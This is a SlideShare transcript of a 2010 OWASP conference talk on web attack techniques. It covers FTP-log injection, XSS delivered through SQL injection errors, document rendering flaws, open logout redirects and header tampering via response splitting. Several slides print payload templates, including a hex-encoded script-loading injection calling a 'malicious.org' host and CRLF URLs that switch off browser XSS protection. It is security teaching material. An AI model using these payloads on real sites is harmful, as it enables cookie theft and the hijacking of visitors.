SlideShare ist ein Scribd-Unternehmen logo

OWASP App Sec US - 2010

Aditya K Sood
Aditya K Sood

OWASP App Sec US Presentation - University of California - Irvine

Technologie
1 von 53
Bug-Alcoholic 2.0 - Untamed World of Web Vulnerabilities Aditya K Sood SecNiche Security Labs Sr. Security Practitioner, Armorize OWASP adi_ks [at] secniche.org AppSec 2010, University of California Irvine, CA, USA Copyright © The OWASP Foundation September 10, 2010 Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
Disclaimer  All contents of this presentation represent my own beliefs and views and do not, unless explicitly stated otherwise, represent the beliefs of my current, or any of my previous in that effect, employers. Dependency  Web penetration testing plays a critical role in assessing the applied security.  Vulnerabilities in deployed products matter a lot.  Testing output depends on exploitation of existing issues and discovering flaws.  Attack classification remains same but modus operandi of attack varies  Testing requires creation of attack surface. OWASP 2
About Me  Founder , SECNICHE Security Labs.  http://www.secniche.org  PhD Candidate at Michigan State University.  Senior Security Practitioner , Armorize  http://www.armorize.com  Worked previously for COSEINC as Senior Security Researcher and Security Consultant for KPMG  Author for HITB E-Zine, Hakin9 ,ELSEVIER, USENIX Journals.  Likes to do Bug Hunting and Malware dissection.  Released Advisories to Forefront Companies.  Active Speaker at Security Conferences including RSA etc.  Blog: http://zeroknock.blogspot.com OWASP 3
Notification All the vulnerabilities discussed in this talk are in the process of patching. This discussion is all about understanding the attack methods and using them further in a real time environment. All for learning and education purposes. OWASP 4
Agenda Web 2.0 – Walkthrough  Web 2.0 – The real world  Web 2.0 trends ( vulnerability classification, browsers state)  Web 2.0 – Exploitation shift  Web Application Security is not a separate component ! Web Vulnerability Hunting(Exemplary) – Cross Interface Attacks (CIA) / attacking backend login consoles / – SQLXSSI – Fusion { XSS, SQL } / XSS payload in SQL parameters / – Document rendering attacks / exploiting content transformation / – Web widgets interface flaws / testing mini web play ground/ – Persistent redirection attacks /exploiting logout modules/ – Declarative security manipulation / tampering browsers/ – Insecure Content inclusion / exploitation by behavior / Conclusion OWASP 5
Web 2.0 – The Present World Components in real world OWASP 6
Web Trends – Incidents Classification Top Web incidents/trends of 2009 /predictions for 2010 © stats by Breach OWASP 7
Web Trends – Vulnerability Classes Web vulnerability classification - 2009 © website stats by Cenzic OWASP 8
Web Trends – Exploited Browsers Web vulnerability classification - 2009 © stats by Cenzic OWASP 9
Web 2.0 – Exploitation Shift Why ?  System vulnerabilities are getting harder to exploit  Web 2.0 service platforms  Client side exploitation – easy control through browsers  Origin of Web as a service standard  Increased business dependency on web 2.0  Centralized platform for content sharing from different resources  Online social networking  Wider window of exploitation through web  Information gathering about targets is easy on web OWASP 10
Web Application – Security Is Not Separate ! Robust Web Application Development Design Security Privacy Reliability OWASP 11
Web Application Vulnerability Hunting Pillars  Design and Development  Attack and Exploitation  Patching and Rebuilding OWASP 12
Cross Interface Attacks (CIA)  Hardware devices using admin interfaces.  Admin interfaces : { Web, FTP, Telnet}  Do we require all admin interfaces ?  If web admin is allowed, so what about backend consoles!  Is URL restriction a good practice?  Is it advantageous to have backend consoles?  Does access control serves well?  CIA targets FTP/Telnet admin consoles.  Step by step developing an attack surface. Hardware devices – firewalls, disk stations, management systems etc OWASP 13
Cross Interface Attacks (CIA)  Attack base and considerations  Presence of FTP/Telnet admin login console  Hardware appliances have default error logging mechanism  Log interfaces are served in HTML without filtering  A bad design practice from security point of view  Protocol such as FTP/Telnet default nature helps in information gathering  FTP Truth Collective username and password authentication  Followed to avoid enumeration of user accounts  No check on login attempts. No check on characters.  Usually, accessible widely. – Do you think access control is required? OWASP 14
Cross Interface Attacks (CIA) Attacking and testing  Gathering information about allowed characters  No aim to get authenticated – FTP 530 Login Incorrect is what we require.  Malicious payloads are used as username and password – Injections / Scripts / Iframes / DOM Calls / Persistent Payloads – Inject what ever you want ! – Good point for triggering CSRF attacks  Of-course , Authentication failure. Error gets logged.  Payloads become persistent. It can be reflective.  Bad design practice – Unencoded / Unfiltered HTML rendering – Inappropriate web logging mechanism  Viola ! Something happens. OWASP 15
Cross Interface Attacks (CIA) Scrutinizing default buffer  To determine the number of characters that are allowed  Supplying excess of buffer in FTP_USER_NAME input  FTP_PASS_WORD reflects the allowed FTP_USER_NAME  Injection points – {FTP_USER_NAME , FTP_PASS_WORD} OWASP 16
Cross Interface Attacks (CIA) Injecting payloads  Supplying payloads as credentials  Input points – {FTP_USER_NAME , FTP_PASS_WORD} OWASP 17
Cross Interface Attacks (CIA) What else?  Anything  Irrespective of user’s environment { OS /Browser etc } OWASP 18
SQLXSSI: Fusion {XSS , SQLI} Differential attack surface  How far we can go in using the standard vulnerabilities?  How many different ways of exploitation can be developed?  Why not fusing one vulnerability into another ?  Its’ all about game of payloads Triggering XSS through SQL Injection  All types of XSS possibilities  Verbose SQLI vulnerability is the base  Errors with truncated SQL queries with parameters  XSS payloads injected in SQL parameters  Obfuscating payloads  Basically, an XSS injection using database semantics  Reflective in nature OWASP 19
SQLXSSI: Fusion {XSS , SQLI} Generalized pattern  <script>alert(document.cookie)</script> = 0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f736 3726970743e http://vulnerable.com/web_page/index.php? id=1and(select1from(selectcount(*),concat(0x3c7363726970743e616c657274282f7363686170 2f293c2f7363726970743e,floor(rand(0)*2)) x from table-name groupby x)a)  <script src="http://wwww.malicious.org/ex.js" />= 3c736372697074207372633d22687474703a2f2f777777772e6d616c6963696f75732 e6f72672f65782e6a7322202f3e http://vulnerable.com/web_page/index.php?id=1and(select1from(selectcount(*),concat(0x 3c736372697074207372633d22687474703a2f2f777777772e6d616c6963696f75732e6f72672f 65782e6a7322202f3e,floor(rand(0)*2)) x from table-name groupby x)a) OWASP 20
SQLXSSI: Fusion {XSS , SQLI} – Example (1) Error gets rendered in browser OWASP 21
SQLXSSI: Fusion {XSS , SQLI} – Example (2) Injected XSS Payload in SQL parameter OWASP 22
SQLXSSI: Fusion {XSS , SQLI} – Example (3) Injected payload starts downloading malicious XLS file OWASP 23
SQLXSSI: Fusion {XSS , SQLI} – Example (4) Image with malicious request is injected OWASP 24
SQLXSSI: Fusion {XSS , SQLI} Real world!  Websites are getting more susceptible to these issues  Vulnerability ratio exceeds to 1:2 Thanks to RB (1337) (http://www.schap.org) for initiating this type of attack surface So what !  One vulnerability can lead to another. Testing is inadvertent.  SQLI can be used in a differential manner  Advanced step in conducting XSS through SQLI  Database design matters OWASP 25
Document Rendering Attacks Concept  Inability of existing filters used for content transformation  Inappropriate design of web applications  Mistake – using browser as editors for content rendering  Do you want to upload you resume in MSWord? Attack vector  Setting payloads as inline URL links in the Office documents  Document is required to be viewed. Preview properties.  Persistent in nature primarily. User interaction is required.  MSWord, PowerPoint etc all work well depending on the web application Bypassing XSS filters through Office documents http://www.secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf OWASP 26
Document Rendering Attacks Payload is injected as Hyperlink OWASP 27
Document Rendering Attacks The document is edited in the enterprise web application OWASP 28
Document Rendering Attacks Exploited OWASP 29
Document Rendering Attacks Case Study XML based authoring flaws  Vulnerability reported in SCRIBD platform in 2009  Reported and patched  Scribd failed to implement a filter on payload set in protocol handlers  Links directly injected and converted to XML  Lastly, compiled and displayed in flash player IPaper Platform XML based Link Authoring Flaw – Scribd http://coseinc.com/en/index.php? rt=download&act=publication&file=design_inaccuracy_inside_ipaper_framework.pdf OWASP 30
XML Authoring Flaw – Case Study XML working model OWASP 31
XML Authoring Flaw – Case Study (Example) OWASP 32
Web Widget Interface Flaws What lies beneath? Web widget  A snippet of HTML code embedded in the website. You can "copy" that code and "embed" in your web page  Gadget is proprietary where as widget is freely available  Diverse functionalities – advertisements, traffic analysis , news, feeds , etc Web widget code snippets  JavaScript  Adobe Flash plugins  Code for embedding Windows Media player  Silverlight plugins OWASP 33
Web Widget Interface Flaws Insecurities Code specification issues  A widget or gadget can be designed insecurely  HTTP parameters play a crucial role in working  Arbitrary code execution in OS – Scripting interface  Unsanitized, unfiltered, unverified data acceptability Interface with websites and triggering vulnerabilities  Understanding the design of widget  Widget interface with the primary website and how it works  Registered widget and domain names in database can cause security problems in the base website OWASP 34
Web Widget Interface Flaws Web widget working layout The model looks simplistic in nature. OWASP 35
Web Widget Interface Flaws Case Study Real time issue in one of most recognized vendor – The website is a leading service provider for news and advertisements – The widget is allowed to install on any custom blog or user website after the registration process. The widget code is changed based on the platform such as blogger , MySpace etc – Once the registration is done, the widget snippet is provided to the user or customer for inclusion in his/her website – Now the content provider has a URL which redirects traffic from the primary website to the registered blog.  A very bad design practice. OWASP 36
Web Widget Interface Flaws Attack scenario Details » Attacker registers his malicious blog with that content provider » Once it is registered, the widget is allowed to be included in the attacker controlled website » Attacker starts using the content provider link to redirect traffic to his blog and making victims vulnerable. OWASP 37
Persistent Redirection Attacks HTTP Redirection  Automated redirection  What If attacker controls  More effective – if persistent OWASP 38
Persistent Redirect Attacks Manipulating Logout Module Details » Enterprise application inbuilt functionality to provide a pre login parameter for inline redirection back to application OWASP home page while logging out of the application 2010 » Careful analysis and design scrutinization helps tester to find parameters which provide a persistent state to set your value A9 » The application does not verifies the value provided in the redirect variable while logging into the application » Another variation of login redirection attacks, this one is logout redirection attacks HackintheBox (HITB) EZine – Open Redirect Wreck Off Paper http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-002.pdf OWASP 39
Persistent Redirection Attacks Manipulating Logout Module Layout – Vulnerability at disclosed to one of the biggest vendor – Successfully exploited and triggered in a large number of applications https://www.example.com/XXX_YYYY/ret.jsp? _pc=STANDARD_WEB_PAGE_STAT&_pi=1800&kk_home_url=http://www.malic ious.org – When a above stated URL is used to login into application, the value of kk_home_url variable becomes persisted. OWASP 40
Declarative Security Manipulation Concept Operation - Idea – The declarative model provides an extensible set of security parameters in the HTTP responses – Browsers can respond with a requested security mechanism – Declared by the developer as part of the web server or application running on the server. In this way, declarative security can provide both a portable and flexible security defense Why declarative security in http response headers – ClickJacking attacks – XSS filtering issues – File downloading security – HTML content rendering OWASP 41
Declarative Security Manipulation HTTP response headers  Clickjacking – X-FRAME-OPTIONS {SAMEORIGIN / DENY} » Don’t allow the website to be framed » Browser automatically escape the framing – X-XSS-PROTECTION { 0 – Disable| 1- Enable} » Triggers inbuilt IE XSS protection » Nothing much to say about its insecurity – X-CONTENT-TYPE-OPERATIONS{ NOSNIFF} » Preventing script execution through images » Secure MIME interpretation – X-DOWNLOAD-OPTIONS{ NOOPEN} » Disallowing opening of files on internet Applied as HTTP response headers– HTTP response splitting attacks work appropriately ( %0d%0a) OWASP 42
Declarative Security - Study Generic attack styles http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-XSS-Protection:0 %0d%0a%0d%0a<html><body><script>alert(‘0wned')</script></body></html> http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Download-Open: %0d%0a%0d%0a<html><body><script>alert(‘0wned')</script></body></html> http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Frame-Options:0 [No value] %0d%0a%0d%0a<html><body><script>alert(‘0wned')</script></body></html> http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Content-Type- Options:[no Value] %0d%0a%0d %0a<html><body><script>alert(‘0wned')</script></body></html> Provide any falisfied value to bedazzle the real working of security component in a browser. OWASP 43
Declarative Security - Study Feasibility study  Implementation of DS in real world  To understand the scenario  To understand the adaptability  To estimate the risk to websites Paper released at Usenix CollSec (Collaborative Methods of Security and Privacy ) :http://www.usenix.org/events/collsec10/tech/full_papers/Sood.pdf OWASP 44
Declarative Security - Study Feasibility study  Alex top 1000 website responses  Google’s GWS implements the most Paper released at Usenix CollSec (Collaborative Methods of Security and Privacy ) :http://www.usenix.org/events/collsec10/tech/full_papers/Sood.pdf OWASP 45
Content Delivery Networks – Stringency Content from third party  Online advertisements  Video streaming content  Windows Media files (MP4, MP3) /Quick time  Embedded Flash files  Inline frames used for rendering contents  EMBED / OBJECT/ FRAME – HTML/DOM supporting elements OWASP 46
Content Delivery Networks – Stringency Web 2.0 requirement OWASP 47
Content Delivery Networks – Stringency  Example – A malicious media player file can infect victims with malware once included from third party content network  Easy to bypass filter Setting the Payload Payload bypasses XSS filter and starts downloading XLS file OWASP 48
WWW Vulnerabilities - Circle Testing and Evolving complex Strengthening Technology Efficient Hacks Complex Flaws OWASP 49
Conclusion Attacks on web infrastructure are increasing More complexity more problems Security is a process and not a one time shot Design according to requirement Test appropriately OWASP 50
Questions and Knowledge Sharing OWASP 51
Demonstrations - Available If Required Shared on Individual Front. OWASP 52
Thanks OWASP (http://www.owasp.org ) SecNiche Security (http://www.secniche.org ) OWASP 53

Empfohlen

OWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryOWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryNikola Milosevic
 
Attques web
Attques webAttques web
Attques webTarek MOHAMED
 
t r
t rt r
t relectronicmingle01
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
OWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementOWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementNikola Milosevic
 
TS-5358
TS-5358TS-5358
TS-5358tutorialsruby
 
Web Application Security Guide by Qualys 2011
Web Application Security Guide by Qualys 2011 Web Application Security Guide by Qualys 2011
Web Application Security Guide by Qualys 2011 nat page
 
Owasp webgoat
Owasp webgoatOwasp webgoat
Owasp webgoatZakaria SMAHI
 

Empfohlen

OWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryOWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryNikola Milosevic
 
Attques web
Attques webAttques web
Attques webTarek MOHAMED
 
t r
t rt r
t relectronicmingle01
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
OWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementOWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementNikola Milosevic
 
TS-5358
TS-5358TS-5358
TS-5358tutorialsruby
 
Web Application Security Guide by Qualys 2011
Web Application Security Guide by Qualys 2011 Web Application Security Guide by Qualys 2011
Web Application Security Guide by Qualys 2011 nat page
 
Owasp webgoat
Owasp webgoatOwasp webgoat
Owasp webgoatZakaria SMAHI
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum
 
PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014Haitham Raik
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
Web 2.0 threats, vulnerability analysis,secure web 2.0 application developmen...
Web 2.0 threats, vulnerability analysis,secure web 2.0 application developmen...Web 2.0 threats, vulnerability analysis,secure web 2.0 application developmen...
Web 2.0 threats, vulnerability analysis,secure web 2.0 application developmen...Marco Morana
 
Project Presentation
Project Presentation Project Presentation
Project Presentation Inaam Ishaque Shaikh
 
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Braindev Kyiv
 
Web application Security tools
Web application Security toolsWeb application Security tools
Web application Security toolsNico Penaredondo
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Philippe De Ryck
 
Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014
Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014
Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014Yosuke HASEGAWA
 
Owasp Forum Web Services Security
Owasp Forum Web Services SecurityOwasp Forum Web Services Security
Owasp Forum Web Services SecurityMarco Morana
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?Four Kitchens
 
Oh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsOh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsTechWell
 
OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1Telefónica
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Abhinav Sejpal
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
OWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.pptOWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.pptjangomanso
 
Qg was guide
Qg was guideQg was guide
Qg was guidenat page
 
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Tom Eston
 
Looking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security ExcellenceLooking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security ExcellenceLudovic Petit
 

Weitere ähnliche Inhalte

Was ist angesagt?

OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum
 
PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014Haitham Raik
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
Web 2.0 threats, vulnerability analysis,secure web 2.0 application developmen...
Web 2.0 threats, vulnerability analysis,secure web 2.0 application developmen...Web 2.0 threats, vulnerability analysis,secure web 2.0 application developmen...
Web 2.0 threats, vulnerability analysis,secure web 2.0 application developmen...Marco Morana
 
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Braindev Kyiv
 
Web application Security tools
Web application Security toolsWeb application Security tools
Web application Security toolsNico Penaredondo
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Philippe De Ryck
 
Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014
Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014
Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014Yosuke HASEGAWA
 
Owasp Forum Web Services Security
Owasp Forum Web Services SecurityOwasp Forum Web Services Security
Owasp Forum Web Services SecurityMarco Morana
 
Oh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsOh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsTechWell
 
OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1Telefónica
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Abhinav Sejpal
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 

Was ist angesagt? (18)

OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meeting
 
PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
Web 2.0 threats, vulnerability analysis,secure web 2.0 application developmen...
Web 2.0 threats, vulnerability analysis,secure web 2.0 application developmen...Web 2.0 threats, vulnerability analysis,secure web 2.0 application developmen...
Web 2.0 threats, vulnerability analysis,secure web 2.0 application developmen...
 
Project Presentation
Project Presentation Project Presentation
Project Presentation
 
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
 
Web application Security tools
Web application Security toolsWeb application Security tools
Web application Security tools
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)
 
Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014
Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014
Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014
 
Owasp Forum Web Services Security
Owasp Forum Web Services SecurityOwasp Forum Web Services Security
Owasp Forum Web Services Security
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?
 
Oh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsOh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web Apps
 
OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
 

Ähnlich wie OWASP App Sec US - 2010

OWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.pptOWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.pptjangomanso
 
Qg was guide
Qg was guideQg was guide
Qg was guidenat page
 
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Tom Eston
 
Looking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security ExcellenceLooking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security ExcellenceLudovic Petit
 
OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE Magno Logan
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Christian Frichot
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareAditya K Sood
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
 
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...Neil Matatall
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request ForgeryOWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request ForgeryOWASP Khartoum
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10 -2007Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10 -2007Vaibhav Gupta
 
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud appsSecurity in the cloud protecting your cloud apps
Security in the cloud protecting your cloud appsCenzic
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-mspMike Saunders
 

Ähnlich wie OWASP App Sec US - 2010 (20)

OWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.pptOWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.ppt
 
Qg was guide
Qg was guideQg was guide
Qg was guide
 
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
 
Looking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security ExcellenceLooking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security Excellence
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web Malware
 
OWASP Top10 2010
OWASP Top10 2010OWASP Top10 2010
OWASP Top10 2010
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
 
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
